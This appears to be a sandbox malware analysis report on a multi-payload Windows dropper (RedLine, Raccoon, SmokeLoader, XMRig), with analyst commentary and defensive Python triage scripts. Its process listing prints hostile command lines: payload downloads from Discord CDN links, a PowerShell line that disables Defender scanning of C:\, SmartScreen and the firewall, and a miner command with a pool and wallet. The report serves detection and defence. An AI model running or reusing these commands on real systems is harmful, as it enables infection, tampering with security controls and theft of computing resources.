Malware Analysis Report

2025-01-02 10:32

Sample ID 210919-wvgezscda2
Target 1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8
SHA256 1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8
Tags
raccoon redline smokeloader xmrig @apafanaell udp backdoor discovery evasion infostealer miner spyware stealer themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8

Threat Level: Known bad

The file 1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8 was found to be: Known bad.

Malicious Activity Summary

raccoon redline smokeloader xmrig @apafanaell udp backdoor discovery evasion infostealer miner spyware stealer themida trojan upx

SmokeLoader

RedLine Payload

xmrig

Modifies security service

Raccoon

RedLine

XMRig Miner Payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Executes dropped EXE

Downloads MZ/PE file

UPX packed file

Checks BIOS information in registry

Deletes itself

Reads user/profile data of web browsers

Themida packer

Loads dropped DLL

Reads user/profile data of local email clients

Drops startup file

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Program crash

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Modifies system certificate store

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-09-19 18:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-19 18:14

Reported

2021-09-19 18:16

Platform

win10-en

Max time kernel

150s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe"

Signatures

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Start = "4" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

MpsSvc is the Windows Defender Firewall service and Start = 4 is SERVICE_DISABLED, so the firewall will no longer start at boot. The PowerShell command line that made this write (see Processes) also adds a Defender exclusion for C:\ and sets EnableSmartScreen = 0; only the MpsSvc write is recorded among this report's signatures, so the outcome of the other two statements is not confirmed here.

Raccoon

stealer raccoon

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
(10 hits; no indicator detail recorded)

SmokeLoader

trojan backdoor smokeloader

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\215E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2F3A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3517.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3C5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\48FE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\512D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B50.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6023.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6023.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6F48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\745A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6023.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fl.exe N/A
N/A N/A C:\ProgramData\Systemd\dllhoster.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\199b1g.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\test.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\199b1g.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\7974777.scr N/A

UPX packed file

upx
Description Indicator Process Target
(4 hits; no indicator detail recorded)

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\48FE.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5B50.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5B50.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\fl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\2F3A.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\215E.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\2F3A.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\48FE.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\fl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\215E.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk C:\Users\Admin\AppData\Local\Temp\fl.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\3C5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3C5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3C5B.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
(12 hits; no indicator detail recorded)

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\5B50.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\fl.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\215E.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\2F3A.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\48FE.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\215E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2F3A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\48FE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5B50.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fl.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\199b1g.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance N/A N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\fl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\fl.exe N/A

AuthRoot\Certificates is the cache CryptoAPI fills when Windows auto-downloads a trusted root during a TLS handshake, so a write there by a process that is busy making HTTPS connections (fl.exe reaches several HTTPS hosts below) can be the OS root-update mechanism rather than a rogue root installed by the malware. A deliberately planted CA more typically lands under SystemCertificates\Root\Certificates. Treat this signature as weak on its own and resolve the thumbprint against the Microsoft trusted root list before calling it tampering.

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe N/A
(62 further hits; process not recorded)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A (30 occurrences, each paired with the row below)
Token: SeCreatePagefilePrivilege N/A N/A N/A (30 occurrences)
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\215E.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2F3A.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3517.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\48FE.exe N/A

The 60 Shutdown/CreatePagefile rows are not attributed to any process in the report and have been collapsed. The rows that matter are the four dropped payloads enabling SeDebugPrivilege, the privilege a process needs to open arbitrary other processes for injection or memory reads.

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
(9 hits; no indicator detail recorded)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target Writes
PID 4696 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe 6
PID 3080 wrote to memory of 4784 N/A N/A C:\Users\Admin\AppData\Local\Temp\215E.exe 3
PID 3080 wrote to memory of 4920 N/A N/A C:\Users\Admin\AppData\Local\Temp\2F3A.exe 3
PID 3080 wrote to memory of 5024 N/A N/A C:\Users\Admin\AppData\Local\Temp\3517.exe 3
PID 3080 wrote to memory of 4100 N/A N/A C:\Users\Admin\AppData\Local\Temp\3C5B.exe 3
PID 3080 wrote to memory of 4128 N/A N/A C:\Users\Admin\AppData\Local\Temp\48FE.exe 3
PID 3080 wrote to memory of 4448 N/A N/A C:\Users\Admin\AppData\Local\Temp\512D.exe 3
PID 3080 wrote to memory of 4488 N/A N/A C:\Users\Admin\AppData\Local\Temp\5B50.exe 3
PID 3080 wrote to memory of 4600 N/A N/A C:\Users\Admin\AppData\Local\Temp\6023.exe 3
PID 4600 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\6023.exe C:\Users\Admin\AppData\Local\Temp\6023.exe 3
PID 3080 wrote to memory of 616 N/A N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe 3
PID 616 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\6B21.exe C:\Users\Admin\AppData\Local\Temp\6B21.exe 8
PID 4600 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\6023.exe C:\Users\Admin\AppData\Local\Temp\6023.exe 5
PID 3080 wrote to memory of 1192 N/A N/A C:\Users\Admin\AppData\Local\Temp\6F48.exe 2
PID 1192 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\6F48.exe C:\Windows\system32\cmd.exe 2
PID 1488 wrote to memory of 1588 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe 2
PID 1488 wrote to memory of 1952 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe 2
PID 1488 wrote to memory of 2132 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe 3
PID 1488 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe 2
PID 3080 wrote to memory of 2704 N/A N/A C:\Users\Admin\AppData\Local\Temp\745A.exe 2

Repeated rows have been collapsed into one row per (writer, target) pair with a write count (64 rows in total). PID 4696 is the submitted sample writing into a second instance of itself (PID 4716; the mapping dump at 0x402DCE under Files belongs to that child), consistent with an unpack-and-inject stage. PID 3080, which launches every later payload, has no image path anywhere in this report; the dump memory/3080-118 under Files is its only trace. The ordinary parent-spawns-child writes (cmd.exe to extd.exe, extd.exe fetching PLQRfphz.exe) are expected for process creation and are not injection on their own.
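A way to read the table above as a process tree, added here as an example rather than anything produced by the sandbox or the malware: it parses rows in the flattened layout the report uses, collapses repeated writes per (writer, target) pair, and tags each pair as a process writing into a copy of itself, a launch from the parent whose image the report never records (PID 3080), or a plain cross-process write. The rows embedded below are an excerpt copied from the table, so the counts they produce are for the excerpt only; the kind labels are this example's own.

```python
import re
from collections import Counter


# Constructed excerpt of the "Suspicious use of WriteProcessMemory" table above,
# copied in the report's flattened column order (Description Indicator Process
# Target). It is an excerpt, so the write counts below are for these rows only.
ROWS = r"""
PID 4696 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe
PID 4696 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe
PID 3080 wrote to memory of 4784 N/A N/A C:\Users\Admin\AppData\Local\Temp\215E.exe
PID 3080 wrote to memory of 4600 N/A N/A C:\Users\Admin\AppData\Local\Temp\6023.exe
PID 4600 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\6023.exe C:\Users\Admin\AppData\Local\Temp\6023.exe
PID 3080 wrote to memory of 1192 N/A N/A C:\Users\Admin\AppData\Local\Temp\6F48.exe
PID 1192 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\6F48.exe C:\Windows\system32\cmd.exe
PID 1488 wrote to memory of 1588 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe
PID 1488 wrote to memory of 2132 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe
"""

# Paths on this page contain no spaces, which the \S+ groups rely on.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_rows(text):
    """Return (writer_pid, target_pid, writer_image, target_image) per row."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            src, dst, _indicator, src_img, dst_img = m.groups()
            rows.append((int(src), int(dst), src_img, dst_img))
    return rows


def summarize(rows):
    """One record per (writer, target) pair: write count, images and a kind tag."""
    counts = Counter((s, d) for s, d, _, _ in rows)
    images = {}
    for s, d, si, di in rows:           # an image seen in either column names that PID
        if si != "N/A":
            images[s] = si
        if di != "N/A":
            images[d] = di
    summary = {}
    for (s, d), n in counts.items():
        si, di = images.get(s, "N/A"), images.get(d, "N/A")
        if si == "N/A":
            kind = "unrecorded-parent"   # the report never names PID 3080's image
        elif si.lower() == di.lower():
            kind = "self-injection"      # a process writing into a copy of itself
        else:
            kind = "cross-process"
        summary[(s, d)] = {"writes": n, "src": si, "dst": di, "kind": kind}
    return summary


def children(summary, pid):
    """Target PIDs written to by pid, in ascending order."""
    return sorted(d for (s, d) in summary if s == pid)


def chain(summary, pid):
    """Walk writer links from pid back to the root of the recorded tree."""
    parents = {d: s for (s, d) in summary}
    path = [pid]
    while path[-1] in parents:
        path.append(parents[path[-1]])
    return path[::-1]


if __name__ == "__main__":
    summary = summarize(parse_rows(ROWS))
    for (s, d), info in sorted(summary.items()):
        print(f"{s:>5} -> {d:<5} x{info['writes']} {info['kind']:<17} {info['dst']}")
    print("chain to PLQRfphz.exe:", " -> ".join(map(str, chain(summary, 2132))))
```

The kind tag is deliberately conservative: "self-injection" only says that writer and target share an image path, which covers both hollowing-style unpacking and a benign parent initialising a child copy, so it is a prompt to look at the target's memory dump, not a verdict.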

Processes

C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe

"C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe"

C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe

"C:\Users\Admin\AppData\Local\Temp\1b5d90a6503efeece07b90f7c482bc754460f77f4357d2aca27a8b92a97514c8.exe"

C:\Users\Admin\AppData\Local\Temp\215E.exe

C:\Users\Admin\AppData\Local\Temp\215E.exe

C:\Users\Admin\AppData\Local\Temp\2F3A.exe

C:\Users\Admin\AppData\Local\Temp\2F3A.exe

C:\Users\Admin\AppData\Local\Temp\3517.exe

C:\Users\Admin\AppData\Local\Temp\3517.exe

C:\Users\Admin\AppData\Local\Temp\3C5B.exe

C:\Users\Admin\AppData\Local\Temp\3C5B.exe

C:\Users\Admin\AppData\Local\Temp\48FE.exe

C:\Users\Admin\AppData\Local\Temp\48FE.exe

C:\Users\Admin\AppData\Local\Temp\512D.exe

C:\Users\Admin\AppData\Local\Temp\512D.exe

C:\Users\Admin\AppData\Local\Temp\5B50.exe

C:\Users\Admin\AppData\Local\Temp\5B50.exe

C:\Users\Admin\AppData\Local\Temp\6023.exe

C:\Users\Admin\AppData\Local\Temp\6023.exe

C:\Users\Admin\AppData\Local\Temp\6023.exe

C:\Users\Admin\AppData\Local\Temp\6023.exe

C:\Users\Admin\AppData\Local\Temp\6B21.exe

C:\Users\Admin\AppData\Local\Temp\6B21.exe

C:\Users\Admin\AppData\Local\Temp\6B21.exe

C:\Users\Admin\AppData\Local\Temp\6B21.exe

C:\Users\Admin\AppData\Local\Temp\6023.exe

C:\Users\Admin\AppData\Local\Temp\6023.exe

C:\Users\Admin\AppData\Local\Temp\6F48.exe

C:\Users\Admin\AppData\Local\Temp\6F48.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\6FED.bat C:\Users\Admin\AppData\Local\Temp\6F48.exe"

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/880498551011049495/883407469894856764/33.exe" "33.exe" "" "" "" "" "" ""

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889204878965088268/889206644829982770/PLQRfphz.exe" "PLQRfphz.exe" "" "" "" "" "" ""

C:\Users\Admin\AppData\Local\Temp\21598\PLQRfphz.exe

PLQRfphz.exe

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe

C:\Users\Admin\AppData\Local\Temp\6FEB.tmp\6FEC.tmp\extd.exe "" "" "" "" "" "" "" "" ""

C:\Users\Admin\AppData\Local\Temp\745A.exe

C:\Users\Admin\AppData\Local\Temp\745A.exe

C:\Users\Admin\AppData\Local\Temp\fl.exe

"C:\Users\Admin\AppData\Local\Temp\fl.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(exit)

C:\ProgramData\Systemd\dllhoster.exe

-o pool.supportxmr.com:5555 -u 44z5DkTXSYBfYECbt5TdQ2SUpyAQJmmGubyUsWqzcByeKwxwsWSZabZQMuE39hedNcTL15eK8kHrAeZMUdGGmHQHBzNH5db -p bloodteam --coin=XMR --cpu-max-threads-hint=35

C:\Users\Admin\AppData\Local\Temp\199b1g.exe

"C:\Users\Admin\AppData\Local\Temp\199b1g.exe"

C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe

"C:\Users\Admin\AppData\Local\Temp\SparestPeculation_2021-09-19_16-22.exe"

C:\Users\Admin\AppData\Local\Temp\test.exe

"C:\Users\Admin\AppData\Local\Temp\test.exe"

C:\Users\Admin\AppData\Local\Temp\199b1g.exe

"C:\Users\Admin\AppData\Local\Temp\199b1g.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 924

C:\Users\Admin\AppData\Roaming\7974777.scr

"C:\Users\Admin\AppData\Roaming\7974777.scr" /S
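Two triage checks over the command lines listed above, added as an example and not tooling from the report or from the malware's authors. The first flags the three defence-evasion statements in the powershell.exe line; the detail that matters is that the original uses U+2013 EN DASH before -Path and -Name, which PowerShell's tokenizer accepts as a parameter dash, so the command runs while a pattern written for ASCII "-Name" silently misses it. (Note also that $HKLM is never defined, so those paths expand to \SOFTWARE\... and \SYSTEM\..., which resolve relative to the HKLM: drive after the cd; the MpsSvc signature above confirms that at least the Set-ItemProperty statement landed.) The second pulls pool, wallet, password and coin out of the argument string recorded for dllhoster.exe and applies a length/alphabet heuristic for a Monero address. The rule names and the Monero heuristic are this example's own, and the command lines are copies embedded inline.

```python
import re
import shlex

# Constructed copies of command lines from the Processes section above. The
# PowerShell line keeps its original U+2013 EN DASH before -Path and -Name;
# the xmrig line is the argument string recorded for dllhoster.exe.
POWERSHELL_CMD = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "$(Add-MpPreference -ExclusionPath C:\\); $(cd HKLM:\\); "
    "$(New-ItemProperty \u2013Path $HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System "
    "\u2013Name EnableSmartScreen -PropertyType DWord -Value 0); "
    "$(Set-ItemProperty -Path $HKLM\\SYSTEM\\CurrentControlSet\\Services\\mpssvc "
    "-Name Start -Value 4); $(exit)"
)
XMRIG_CMD = (
    "-o pool.supportxmr.com:5555 "
    "-u 44z5DkTXSYBfYECbt5TdQ2SUpyAQJmmGubyUsWqzcByeKwxwsWSZabZQMuE39hedNcTL15eK8kHrAeZMUdGGmHQHBzNH5db "
    "-p bloodteam --coin=XMR --cpu-max-threads-hint=35"
)
BENIGN_CMD = '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Get-MpPreference'

# PowerShell's tokenizer accepts EN DASH, EM DASH and HORIZONTAL BAR as the
# parameter dash, so the command runs as written while a detector that only
# looks for ASCII "-Name" misses it. Fold them to '-' before matching.
DASHES = str.maketrans({"\u2013": "-", "\u2014": "-", "\u2015": "-"})

# Rule names are this example's own; the patterns target the three statements
# in the command line above and assume dashes have already been folded.
PS_TAMPER_RULES = [
    ("defender-exclusion",
     re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\b", re.I)),
    ("smartscreen-off",
     re.compile(r"-Name\s+EnableSmartScreen\b.*?-Value\s+0\b", re.I)),
    ("firewall-service-disabled",
     re.compile(r"Services\\mpssvc\b.*?-Name\s+Start\s+-Value\s+4\b", re.I)),
]


def normalize_dashes(cmd):
    return cmd.translate(DASHES)


def detect_ps_tampering(cmd):
    """Rule names that fire after Unicode dashes are folded (the right way)."""
    folded = normalize_dashes(cmd)
    return [name for name, rx in PS_TAMPER_RULES if rx.search(folded)]


def detect_naive(cmd):
    """Same rules without folding: shows what an ASCII-only matcher misses."""
    return [name for name, rx in PS_TAMPER_RULES if rx.search(cmd)]


# Bitcoin/Monero base58 alphabet: no 0, O, I or l.
BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")


def looks_like_monero_address(s):
    """Heuristic only (no checksum): standard and sub-addresses are 95 base58
    characters starting with 4 or 8; integrated addresses are 106 starting with 4."""
    if not s or not set(s) <= BASE58:
        return False
    return (len(s) == 95 and s[0] in "48") or (len(s) == 106 and s[0] == "4")


def parse_xmrig_args(cmd):
    """Pull pool, wallet, password and --key=value options out of an xmrig-style
    argument string. Unknown positional tokens are skipped."""
    args = shlex.split(cmd)
    short = {"-o": "pool", "-u": "wallet", "-p": "password"}
    cfg = {}
    i = 0
    while i < len(args):
        a = args[i]
        if a in short and i + 1 < len(args):
            cfg[short[a]] = args[i + 1]
            i += 2
            continue
        if a.startswith("--") and "=" in a:
            key, value = a[2:].split("=", 1)
            cfg[key] = value
        i += 1
    if "wallet" in cfg:
        cfg["wallet_is_monero"] = looks_like_monero_address(cfg["wallet"])
    return cfg


if __name__ == "__main__":
    print("folded :", detect_ps_tampering(POWERSHELL_CMD))
    print("naive  :", detect_naive(POWERSHELL_CMD))
    print("benign :", detect_ps_tampering(BENIGN_CMD))
    print("xmrig  :", parse_xmrig_args(XMRIG_CMD))
```

When turning this into a real detection, fold dashes (and ideally decode -EncodedCommand payloads) in the normalisation stage so that every rule benefits, rather than adding Unicode alternatives to individual patterns.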

Network

Country Destination Domain Proto Connections
US 8.8.8.8:53 venerynnet1.top udp 1
US 8.8.8.8:53 kevonahira2.top udp 1
RU 45.144.67.29:80 kevonahira2.top tcp 32
NL 190.2.145.108:12608 - tcp 1
NL 193.56.146.36:80 193.56.146.36 tcp 1
US 8.8.8.8:53 iryarahara.xyz udp 1
RU 77.246.145.4:80 iryarahara.xyz tcp 1
RU 45.9.20.20:13441 - tcp 1
US 8.8.8.8:53 api.ip.sb udp 1
US 104.26.13.31:443 api.ip.sb tcp 10
US 8.8.8.8:53 telete.in udp 1
DE 195.201.225.248:443 telete.in tcp 1
DE 74.119.192.122:80 74.119.192.122 tcp 2
NL 190.2.145.156:80 - tcp 1
NL 45.67.231.145:10991 - tcp 1
US 8.8.8.8:53 cdn.discordapp.com udp 1
US 162.159.130.233:443 cdn.discordapp.com tcp 3
